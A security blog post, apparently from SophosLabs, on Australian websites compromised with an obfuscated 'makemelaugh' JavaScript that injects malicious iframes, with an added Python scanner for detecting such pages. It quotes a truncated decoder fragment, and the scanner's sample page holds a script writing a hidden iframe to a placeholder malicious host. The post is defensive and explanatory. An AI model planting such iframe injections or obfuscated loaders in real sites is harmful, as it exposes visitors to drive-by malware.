No laughing matter – hacked websites in Oz

Readers will no doubt have read numerous postings and articles about the use of compromised sites in malicious attacks (currently the de rigueur technique for malicious code delivery). Unfortunately there are many ‘ways in’ (vulnerabilities in libraries, cross-site scripting (XSS) attacks, web application vulnerabilities and poorly secured web servers, to name but a few), and in many cases only a limited ability to identify and resolve compromised pages. A significant percentage of sites are outsourced to web development companies as a one-off exercise, with little consideration given to requirements such as ongoing site maintenance and security.

Over the past week or so SophosLabs have become aware of several web sites hosted in Australia that have been compromised. In each case, pages on the site have been modified by appending an obfuscated JavaScript, characterized by the use of a function named ‘makemelaugh’. Compromised pages are proactively detected by Sophos as Mal/ObfJS-A.

<script language=Javascript>
function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,
s=0,w=0,t=Array(63,1,20,2,3,27 <snip> }

The script serves the usual purpose – writing an additional HTML iframe tag into the page so that malicious content is loaded when a victim browses the compromised site. Aside from the detection of compromised pages, all the sites referenced in the malicious iframe tags are currently known and classified as high risk by Sophos.
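As an added example (not Sophos code, and not the original script), a small scanner a site owner could run over their own HTML files to flag the pattern described above: a script block whose decoder is named ‘makemelaugh’, a script that writes an iframe, script content appended after the closing </html> tag, and tiny or hidden iframes. The sample page, decoder stub and domain are constructed placeholders.

```python
import re

# Constructed sample of a compromised page (not a real capture): the site's own
# content, followed by an appended script whose decoder is named 'makemelaugh'.
# The decoder body is a stub and the iframe target is a placeholder domain.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1><p>Our company page.</p></body></html>
<script language=Javascript>
function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,1,20,2);/* stub */}
document.write('<iframe src="http://malicious.example/in.cgi?3" width=1 height=1></iframe>');
</script>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
DECODER_RE = re.compile(r"\bfunction\s+makemelaugh\s*\(", re.I)
WRITES_IFRAME_RE = re.compile(r"document\.write\s*\([^)]*<iframe", re.I | re.S)
# Tiny or hidden iframes are the usual way injected content is kept out of sight.
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*?(?:width|height)\s*=\s*['\"]?[01]\b[^>]*>"
    r"|<iframe\b[^>]*?(?:visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>", re.I)


def scan_html(html):
    """Return (indicator, evidence) pairs for one page's HTML; [] means clean."""
    findings = []
    html_close = html.lower().rfind("</html>")
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        if DECODER_RE.search(body):
            findings.append(("makemelaugh_decoder", "function makemelaugh(...)"))
        if WRITES_IFRAME_RE.search(body):
            findings.append(("script_writes_iframe", body.strip()[:60]))
        # Injection by appending leaves script after the closing </html> tag,
        # which a hand-written page should not have.
        if html_close != -1 and m.start() > html_close:
            findings.append(("script_after_html_close", m.group(0)[:40]))
    for m in HIDDEN_IFRAME_RE.finditer(html):
        findings.append(("hidden_iframe", m.group(0)[:80]))
    return findings


def scan_files(paths):
    """Scan several HTML files; returns {path: findings} for files with hits."""
    hits = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            found = scan_html(fh.read())
        if found:
            hits[path] = found
    return hits


if __name__ == "__main__":
    for indicator, evidence in scan_html(SAMPLE_PAGE):
        print(f"{indicator:24} {evidence}")
```

The indicators are deliberately coarse; a hit is a prompt to diff the file against a known-good copy, not proof of compromise on its own.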

As is often the case, these sites are set up specifically for this purpose, and do not host any legitimate content. Viewing the root of one such domain, you are presented with a very familiar placeholder page:

Placeholder page at root of domain

Users surfing the web tend to place implicit trust in the sites they browse. The reality is that by browsing a site you are exposing yourself to a certain amount of risk, and placing some trust in the security of that site. Careful selection of operating system, browser, browser configuration and the like is therefore absolutely essential.